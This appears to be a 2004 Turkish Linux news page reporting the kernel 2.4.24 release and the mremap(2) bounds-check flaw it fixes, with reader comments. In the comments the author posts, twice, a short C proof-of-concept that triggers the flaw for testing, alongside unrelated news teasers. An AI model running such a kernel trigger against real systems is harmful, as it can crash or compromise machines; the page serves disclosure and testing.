Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linux´ta OfficeXP ve Photoshop 7
murat09
30 Nisan 2003, 1 dakika okuma süresi

CodeWeavers Win32 uygulamalarını Linux'ta çalıştırmak isteyen kullanıcılar ve kurumlar için uygulamalar geliştiriyor. Crossover Office adlı set, şu anda 2.0 sürümünde ve Office XP (Outlook hariç), Adobe Photoshop, Microsoft Access ve Lotus uygulamalarını RedHat 9, Mandrake 9.0 ve SuSE 8.1 Linux dağıtımlarında çalıştırmanıza imkan tanıyor. Programın lisans ücreti ise 59$.

Chip Özel Sayısı: Red Hat 9.0 Beta!
anonim
20 Nisan 2003, 1 dakika okuma süresi

Chip Dergisi bu ay çıkarttığı özel sayısında, Red Hat 9.0 Beta'yı veriyor.

Gazete bayilerinde 9,5 milyona satılmakta olan bu sayıda neden 9.0'ın kendisini değil de Betasının verildiği, dahası bunun neden derginin hiçbir yerinde belirtilmeyip, ancak kuruluma başlayınca görülebildiği bir soru işareti.

Bir başka soru işareti de, 'Dünyada ilk defa bir dergi RedHat 9.0'ı çıkar çıkmaz veriyor'ifadesinde. Bilindiği üzere RedHat firması ismin imtiyaz sahibi ve ondan izin alınmadan RedHat adı altında bu dağıtımın dağıtılması kesinlikle yasak. Peki Chip bu işi nasıl yaptı ?
Az önce aldığımız bir habere göre Vogel, Chip Özel Sayısını piyasadan çekmek için harekete geçmiş! Şu anda derginin dağıtılmış sayıları bayilerden toplanıyor!

Jabber Sunucusu ve Kullanımı
caglar_onur
31 Ekim 2004, 1 dakika okuma süresi

Linux Kullanıcıları Derneği, 3 Kasım 2004 Çarşamba günü saat 18:30'da Ankara Üniversitesi Fen Fakültesi Kırmızı Salon'da bir seminer düzenliyor. Seminerde Jabber ve XML protokollerinin yanı sıra örnek Jabber sunucu ve istemci yazılımlarından bazıları örneklerle incelenecek ve web/veritabanı uygulamalarına Jabber protokolü ile entegrasyon sağlayan J-Spy, J-Bot, J-Admin ve J-Guard adlı GPL yazılımları tanıtılacaktır.

http://seminer.linux.org.tr

FreeBSD 4.3 Çıktı
sundance
22 Nisan 2001, 1 dakika okuma süresi

x86 platformu üstünde (birçoklarına göre) en güvenilir işletim sistemi, FreeBSD sonunda 4.3 versionu çıkarttı.

Birçok yazılımın son hallerinin olduğu bu dağıtım (Scite 1.36 var mesela :) birçoklarını mutlu edeceğe benziyor.

Bozuk Ram` ınız mı var ?
sundance
26 Ekim 2000, 2 dakika okuma süresi

Verin Linux kullansın !!!
Yanlış duymadınız. Linux kernel için yazılan yeni bir mod sayesinde artık üretim aşamasında ıskartaya çıkmış ram modülleri Linux makinalarda kullanılabilecek.
Düşünsenize bir Sun E3500'e 1Gb Ram takmak en az $10000 iken sizin evinizdeki süper sistemin sadece $100 gibi bir fiyata 980Mb (bir kısmı kullanılamıyor ya :) Ram'ı olacak.
Açık kaynak kodlu işletim sisteminin yararları işte bunlar